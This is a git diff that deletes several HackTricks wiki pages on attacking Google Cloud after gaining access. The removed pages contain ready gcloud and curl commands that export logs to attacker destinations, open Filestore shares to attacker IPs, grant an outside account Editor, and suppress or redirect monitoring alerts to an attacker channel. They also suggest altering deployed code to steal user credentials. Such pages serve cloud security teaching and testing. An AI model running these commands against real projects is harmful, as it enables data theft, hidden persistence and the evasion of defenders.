- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md deleted file mode 100644 index 05deeb7fa..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Logging Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Logging - -Find more information about Logging in: - -{% content-ref url="../gcp-services/gcp-logging-enum.md" %} -[gcp-logging-enum.md](../gcp-services/gcp-logging-enum.md) -{% endcontent-ref %} - -### `logging.sinks.create` - -Create a sink to exfiltrate the logs to an attackers accessible destination: - -{% code overflow="wrap" %} -```bash -gcloud logging sinks create --log-filter="FILTER_CONDITION" -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md deleted file mode 100644 index 09a46acea..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md +++ /dev/null @@ -1,48 +0,0 @@ -# GCP - Secret Manager Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secret Manager - -Find more information about Secret Manager in: - -{% content-ref url="../gcp-services/gcp-secrets-manager-enum.md" %} -[gcp-secrets-manager-enum.md](../gcp-services/gcp-secrets-manager-enum.md) -{% endcontent-ref %} - -### Rotation misuse - -An attacker could update the secret to: - -* **Stop rotations** so the secret won't be modified -* **Make rotations much less often** so the secret won't be modified -* **Publish the rotation message to a different pub/sub** -* **Modify the rotation code being executed.** This happens in a different service, probably in a Cloud Function, so the attacker will need privileged access over the Cloud Function or any other service. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md deleted file mode 100644 index ada06789d..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md +++ /dev/null @@ -1,64 +0,0 @@ -# GCP - Storage Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage - -For more information about Cloud Storage check: - -{% content-ref url="../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### `storage.hmacKeys.create` - -You can create an HMAC to maintain persistence over a bucket. For more information about this technique [**check it here**](../gcp-privilege-escalation/gcp-storage-privesc.md#storage.hmackeys.create). - -```bash -# Create key -gsutil hmac create - -# Configure gsutil to use it -gsutil config -a - -# Use it -gsutil ls gs://[BUCKET_NAME] -``` - -Another exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py). - -### Give Public Access - -**Making a bucket publicly accessible** is another way to maintain access over the bucket. Check how to do it in: - -{% content-ref url="../gcp-post-exploitation/gcp-storage-post-exploitation.md" %} -[gcp-storage-post-exploitation.md](../gcp-post-exploitation/gcp-storage-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md deleted file mode 100644 index 5c17fd3ec..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md +++ /dev/null @@ -1,70 +0,0 @@ -# GCP - App Engine Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## `App Engine` - -For information about App Engine check: - -{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %} -[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md) -{% endcontent-ref %} - -### `appengine.memcache.addKey` | `appengine.memcache.list` | `appengine.memcache.getKey` | `appengine.memcache.flush` - -With these permissions it's possible to: - -* Add a key -* List keys -* Get a key -* Delete - -{% hint style="danger" %} -However, I **couldn't find any way to access this information from the cli**, only from the **web console** where you need to know the **Key type** and the **Key name**, of from the a**pp engine running app**. - -If you know easier ways to use these permissions send a Pull Request! -{% endhint %} - -### `logging.views.access` - -With this permission it's possible to **see the logs of the App**: - -```bash -gcloud app logs tail -s -``` - -### Read Source Code - -The source code of all the versions and services are **stored in the bucket** with the name **`staging..appspot.com`**. If you have write access over it you can read the source code and search for **vulnerabilities** and **sensitive information**. - -### Modify Source Code - -Modify source code to steal credentials if they are being sent or perform a defacement web attack. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md deleted file mode 100644 index 4eb194006..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - Artifact Registry Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Artifact Registry - -For more information about Artifact Registry check: - -{% content-ref url="../gcp-services/gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](../gcp-services/gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### Privesc - -The Post Exploitation and Privesc techniques of Artifact Registry were mixed in: - -{% content-ref url="../gcp-privilege-escalation/gcp-artifact-registry-privesc.md" %} -[gcp-artifact-registry-privesc.md](../gcp-privilege-escalation/gcp-artifact-registry-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md deleted file mode 100644 index 7fc7b5f47..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md +++ /dev/null @@ -1,56 +0,0 @@ -# GCP - Cloud Build Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Build - -For more information about Cloud Build check: - -{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %} -[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md) -{% endcontent-ref %} - -### `cloudbuild.builds.approve` - -With this permission you can approve the execution of a **codebuild that require approvals**. - -```bash -# Check the REST API in https://cloud.google.com/build/docs/api/reference/rest/v1/projects.locations.builds/approve -curl -X POST \ - -H "Authorization: Bearer $(gcloud auth print-access-token)" \ - -H "Content-Type: application/json" \ - -d '{{ - "approvalResult": { - object (ApprovalResult) - } - }' \ - "https://cloudbuild.googleapis.com/v1/projects//locations//builds/:approve" -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md deleted file mode 100644 index 0e6bdccac..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Cloud Run Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -For more information about Cloud Run check: - -{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %} -[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md) -{% endcontent-ref %} - -### Access the images - -If you can access the container images check the code for vulnerabilities and hardcoded sensitive information. Also for sensitive information in env variables. - -If the images are stored in repos inside the service Artifact Registry and the user has read access over the repos, he could also download the image from this service. - -### Modify & redeploy the image - -Modify the run image to steal information and redeploy the new version (just uploading a new docker container with the same tags won't get it executed). For example, if it's exposing a login page, steal the credentials users are sending. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md deleted file mode 100644 index 037d748cf..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md +++ /dev/null @@ -1,130 +0,0 @@ -# GCP - Filestore Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Filestore - -For more information about Filestore check: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Mount Filestore - -A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**: - -{% code overflow="wrap" %} -```bash -sudo apt-get update -sudo apt-get install nfs-common -# Check the share name -showmount -e -# Mount the share -mkdir /mnt/fs -sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs -``` -{% endcode %} - -To find the IP address of a filestore insatnce check the enumeration section of the page: - -{% content-ref url="../gcp-services/gcp-filestore-enum.md" %} -[gcp-filestore-enum.md](../gcp-services/gcp-filestore-enum.md) -{% endcontent-ref %} - -### Remove Restrictions and get extra permissions - -If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share: - -```bash -gcloud filestore instances update nfstest \ - --zone= \ - --flags-file=nfs.json - -# Contents of nfs.json -{ - "--file-share": - { - "capacity": "1024", - "name": "", - "nfs-export-options": [ - { - "access-mode": "READ_WRITE", - "ip-ranges": [ - "/32" - ], - "squash-mode": "NO_ROOT_SQUASH", - "anon_uid": 1003, - "anon_gid": 1003 - } - ] - } -} -``` - -### Restore a backup - -If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:** - -```bash -# Create a new filestore if you don't want to modify the old one -gcloud filestore instances create \ - --zone= \ - --tier=STANDARD \ - --file-share=name=vol1,capacity=1TB \ - --network=name=default,reserved-ip-range=10.0.0.0/29 - -# Restore a backups in a new instance -gcloud filestore instances restore \ - --zone= \ - --file-share= \ - --source-backup= \ - --source-backup-region= - -# Follow the previous section commands to mount it -``` - -### Create a backup and restore it - -If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned: - -{% code overflow="wrap" %} -```bash -# Create share backup -gcloud filestore backups create \ - --region= \ - --instance= \ - --instance-zone= \ - --file-share= - -# Follow the previous section commands to restore it and mount it -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md deleted file mode 100644 index 4181accdc..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - IAM Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## IAM - -You can find further information about IAM in: - -{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %} -[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md) -{% endcontent-ref %} - -### Granting access to management console - -Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**. - -To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor. - -You can use the following command to **grant a user the primitive role of Editor** to your existing project: - -{% code overflow="wrap" %} -```bash -gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor -``` -{% endcode %} - -If you succeeded here, try **accessing the web interface** and exploring from there. - -This is the **highest level you can assign using the gcloud tool**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md b/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md deleted file mode 100644 index d1ec7ef27..000000000 --- a/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md +++ /dev/null @@ -1,146 +0,0 @@ -# GCP - Monitoring Post Exploitation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Monitoring - -Fore more information check: - -{% content-ref url="../gcp-services/gcp-monitoring-enum.md" %} -[gcp-monitoring-enum.md](../gcp-services/gcp-monitoring-enum.md) -{% endcontent-ref %} - -For other ways to disrupt logs check: - -{% content-ref url="gcp-logging-post-exploitation.md" %} -[gcp-logging-post-exploitation.md](gcp-logging-post-exploitation.md) -{% endcontent-ref %} - -### `monitoring.alertPolicies.delete` - -Delete an alert policy: - -```bash -gcloud alpha monitoring policies delete -``` - -### `monitoring.alertPolicies.update` - -Disrupt an alert policy: - -```bash -# Disable policy -gcloud alpha monitoring policies update --no-enabled - -# Remove all notification channels -gcloud alpha monitoring policies update --clear-notification-channels - -# Chnage notification channels -gcloud alpha monitoring policies update --set-notification-channels=ATTACKER_CONTROLLED_CHANNEL - -# Modify alert conditions -gcloud alpha monitoring policies update --policy="{ 'displayName': 'New Policy Name', 'conditions': [ ... ], 'combiner': 'AND', ... }" -# or use --policy-from-file -``` - -### `monitoring.dashboards.update` - -Modify a dashboard to disrupt it: - -```bash -# Disrupt dashboard -gcloud monitoring dashboards update --config=''' - displayName: New Dashboard with New Display Name - etag: 40d1040034db4e5a9dee931ec1b12c0d - gridLayout: - widgets: - - text: - content: Hello World - ''' -``` - -### `monitoring.dashboards.delete` - -Delete a dashboard: - -```bash -# Delete dashboard -gcloud monitoring dashboards delete -``` - -### `monitoring.snoozes.create` - -Prevent policies from generating alerts by creating a snoozer: - -{% code overflow="wrap" %} -```bash -# Stop alerts by creating a snoozer -gcloud monitoring snoozes create --display-name="Maintenance Week" \ - --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ - --start-time="2023-03-01T03:00:00.0-0500" \ - --end-time="2023-03-07T23:59:59.5-0500" -``` -{% endcode %} - -### `monitoring.snoozes.update` - -Update the timing of a snoozer to prevent alerts from being created when the attacker is interested: - -{% code overflow="wrap" %} -```bash -# Modify the timing of a snooze -gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME - -# odify everything, including affected policies -gcloud monitoring snoozes update --snooze-from-file= -``` -{% endcode %} - -### `monitoring.notificationChannels.delete` - -Delete a configured channel: - -```bash -# Delete channel -gcloud alpha monitoring channels delete -``` - -### `monitoring.notificationChannels.update` - -Update labels of a channel to disrupt it: - -{% code overflow="wrap" %} -```bash -# Delete or update labels, for example email channels have the email indicated here -gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels -gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
